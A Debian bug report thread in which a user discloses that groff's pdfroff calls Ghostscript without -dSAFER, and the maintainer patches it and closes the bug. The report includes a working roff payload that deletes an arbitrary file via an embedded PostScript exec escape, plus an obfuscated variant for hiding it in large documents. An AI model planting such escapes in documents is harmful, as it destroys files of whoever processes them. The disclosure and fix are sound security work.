Acknowledgement sent
to "brian m. carlson" <sandals@crustytoothpaste.ath.cx>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Colin Watson <cjwatson@debian.org>.
(Fri, 24 Jul 2009 22:21:04 GMT) (full text, mbox, link).
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security
pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:
lakeview ok % cat attack.roff
I am an evil attacking document. Boo!
\X'ps: exec (/tmp/remove-me) deletefile'
lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
removed
Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.
Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden. Disguising
it is easy, such as in:
lakeview ok % cat attack.roff
I am an evil attacking document. Boo!
.ds df deletefile
.ds fn /tmp/remove-me
\X'ps: exec (\*(fn) \*(df'
Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.
-- System Information:
Debian Release: squeeze/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4
Versions of packages groff depends on:
ii groff-base 1.20.1-4 GNU troff text-formatting system (
ii libc6 2.9-21 GNU C Library: Shared libraries
ii libgcc1 1:4.4.1-1 GCC support library
ii libice6 2:1.0.5-1 X11 Inter-Client Exchange library
ii libsm6 2:1.1.0-2 X11 Session Management library
ii libstdc++6 4.4.1-1 The GNU Standard C++ Library v3
ii libx11-6 2:1.2.2-1 X11 client-side library
ii libxaw7 2:1.0.5-2 X11 Athena Widget library
ii libxmu6 2:1.0.4-1 X11 miscellaneous utility library
ii libxt6 1:1.0.5-3 X11 toolkit intrinsics library
Versions of packages groff recommends:
ii ghostscript 8.64~dfsg-13 The GPL Ghostscript PostScript/PDF
ii imagemagick 7:6.5.1.0-1.1 image manipulation programs
ii libpaper1 1.1.23+nmu1 library for handling paper charact
ii netpbm 2:10.0-12 Graphics conversion tools
ii psutils 1.17-26 A collection of PostScript documen
groff suggests no packages.
-- no debconf information
--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security
pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:
lakeview ok % cat attack.roff
I am an evil attacking document. Boo!
\X'ps: exec (/tmp/remove-me) deletefile'
lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
removed
Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.
Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden. Disguising
it is easy, such as in:
lakeview ok % cat attack.roff
I am an evil attacking document. Boo!
.ds df deletefile
.ds fn /tmp/remove-me
\X'ps: exec (\*(fn) \*(df'
Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.
-- System Information:
Debian Release: squeeze/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4
Versions of packages groff depends on:
ii groff-base 1.20.1-4 GNU troff text-formatting system (
ii libc6 2.9-21 GNU C Library: Shared libraries
ii libgcc1 1:4.4.1-1 GCC support library
ii libice6 2:1.0.5-1 X11 Inter-Client Exchange library
ii libsm6 2:1.1.0-2 X11 Session Management library
ii libstdc++6 4.4.1-1 The GNU Standard C++ Library v3
ii libx11-6 2:1.2.2-1 X11 client-side library
ii libxaw7 2:1.0.5-2 X11 Athena Widget library
ii libxmu6 2:1.0.4-1 X11 miscellaneous utility library
ii libxt6 1:1.0.5-3 X11 toolkit intrinsics library
Versions of packages groff recommends:
ii ghostscript 8.64~dfsg-13 The GPL Ghostscript PostScript/PDF
ii imagemagick 7:6.5.1.0-1.1 image manipulation programs
ii libpaper1 1.1.23+nmu1 library for handling paper charact
ii netpbm 2:10.0-12 Graphics conversion tools
ii psutils 1.17-26 A collection of PostScript documen
groff suggests no packages.
-- no debconf information
--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
On Sat, Jul 25, 2009 at 09:32:38AM +0100, Colin Watson wrote:
> groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
> do so here?
I'm applying this patch to the Debian package. Please consider it?
=== modified file 'contrib/pdfmark/pdfroff.sh'
--- contrib/pdfmark/pdfroff.sh 2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.sh 2009-08-15 07:57:43 +0000
@@ -600,7 +600,7 @@
$SAY >&2 $n "Writing PDF output ..$c"
if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"
then
- PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE
+ PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE -dSAFER
-sDEVICE=pdfwrite -sOutputFile="${PDF_OUTPUT-"-"}
elif test -n "$PDF_OUTPUT"
Thanks,
--
Colin Watson [cjwatson@debian.org]
On Sat, Aug 15, 2009 at 08:59:08AM +0100, Colin Watson wrote:
> On Sat, Jul 25, 2009 at 09:32:38AM +0100, Colin Watson wrote:
> > groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
> > do so here?
>
> I'm applying this patch to the Debian package. Please consider it?
Or, in fact, this patch, which adjusts the documentation too.
=== modified file 'contrib/pdfmark/pdfroff.man'
--- contrib/pdfmark/pdfroff.man 2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.man 2009-08-15 08:00:24 +0000
@@ -521,7 +521,7 @@ defaults to
.IP
.I
.ad l
-.NH gs \-dBATCH \-dQUIET \-dNOPAUSE \-sDEVICE=pdfwrite \-sOutputFile=\-
+.NH gs \-dBATCH \-dQUIET \-dNOPAUSE \-dSAFER \-sDEVICE=pdfwrite \-sOutputFile=\-
.ad
.RE
.
=== modified file 'contrib/pdfmark/pdfroff.sh'
--- contrib/pdfmark/pdfroff.sh 2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.sh 2009-08-15 07:57:43 +0000
@@ -600,7 +600,7 @@
$SAY >&2 $n "Writing PDF output ..$c"
if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"
then
- PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE
+ PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE -dSAFER
-sDEVICE=pdfwrite -sOutputFile="${PDF_OUTPUT-"-"}
elif test -n "$PDF_OUTPUT"
Thanks,
--
Colin Watson [cjwatson@debian.org]
Reply sent
to Colin Watson <cjwatson@debian.org>:
You have taken responsibility.
(Sat, 15 Aug 2009 10:30:09 GMT) (full text, mbox, link).
Notification sent
to "brian m. carlson" <sandals@crustytoothpaste.ath.cx>:
Bug acknowledged by developer.
(Sat, 15 Aug 2009 10:30:10 GMT) (full text, mbox, link).
Source: groff
Source-Version: 1.20.1-5
We believe that the bug you reported is fixed in the latest version of
groff, which is due to be installed in the Debian FTP archive:
groff-base_1.20.1-5_i386.deb
to pool/main/g/groff/groff-base_1.20.1-5_i386.deb
groff_1.20.1-5.diff.gz
to pool/main/g/groff/groff_1.20.1-5.diff.gz
groff_1.20.1-5.dsc
to pool/main/g/groff/groff_1.20.1-5.dsc
groff_1.20.1-5_i386.deb
to pool/main/g/groff/groff_1.20.1-5_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 538338@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Colin Watson <cjwatson@debian.org> (supplier of updated groff package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Sat, 15 Aug 2009 09:01:47 +0100
Source: groff
Binary: groff-base groff
Architecture: source i386
Version: 1.20.1-5
Distribution: unstable
Urgency: low
Maintainer: Colin Watson <cjwatson@debian.org>
Changed-By: Colin Watson <cjwatson@debian.org>
Description:
groff - GNU troff text-formatting system
groff-base - GNU troff text-formatting system (base system components)
Closes: 538330538338541019541621
Changes:
groff (1.20.1-5) unstable; urgency=low
.
* Upgrade to debhelper v7. (There's still lots of complexity here, so no
dh(1).)
* Remove Fumitoshi UKAI from Uploaders, with thanks for his previous work.
Just shout if you want to be added back (closes: #541019).
* Unset IFS at nroff startup (closes: #541621).
* Patch from Openwall to fix temporary file handling vulnerabilities in
pdfroff (closes: #538330).
* Use -dSAFER when calling gs from pdfroff (thanks, brian m. carlson;
closes: #538338).
Checksums-Sha1:
07d34cdf3f9a41ac8f80e7b38861afd2a4332bc1 1258 groff_1.20.1-5.dsc
afc572adbb7f9c762c50048ad3eec5cd1952f3ef 41184 groff_1.20.1-5.diff.gz
89ee0590a202dca5c08415edafad39d7224a4375 1103698 groff-base_1.20.1-5_i386.deb
d0a0c97b9156d9be0ae0d19af004ecf08cd95601 3512134 groff_1.20.1-5_i386.deb
Checksums-Sha256:
6d7fe33055e63798e631cbb0208f57be1affd53616cd525644263c7bd0270a9d 1258 groff_1.20.1-5.dsc
ab37002d146cb29d907ad8097c2620e1e63c699aaed1f394bd032b7ab8625fa6 41184 groff_1.20.1-5.diff.gz
01003d22439094286fdcf1c5ef036ba2a825215ef816e9939a2f944aa9301c6e 1103698 groff-base_1.20.1-5_i386.deb
0b0b8fec29f42590ef2bb1f90e36fe1db18974152abe1f68824ac40ea5c254db 3512134 groff_1.20.1-5_i386.deb
Files:
db341bf62664c0afefd71016c9cc3888 1258 text important groff_1.20.1-5.dsc
3bfaace1000bf8687ec8d6c02c84b1e6 41184 text important groff_1.20.1-5.diff.gz
a93b5459d35d5bb1c522642a18bca234 1103698 text important groff-base_1.20.1-5_i386.deb
e4558537f026c6d0db872a5c8efa6a95 3512134 text optional groff_1.20.1-5_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Colin Watson <cjwatson@debian.org> -- Debian developer
iD8DBQFKhm6T9t0zAhD6TNERAmwQAJ4uNNVsSBiTzKXdhJ5OPU/LXbqSWwCbBbJn
XTXdB9uhIGw+9ivXuNSpnIA=
=fTmN
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Wed, 16 Sep 2009 07:34:45 GMT) (full text, mbox, link).
Debbugs is free software and licensed under the terms of the GNU General
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.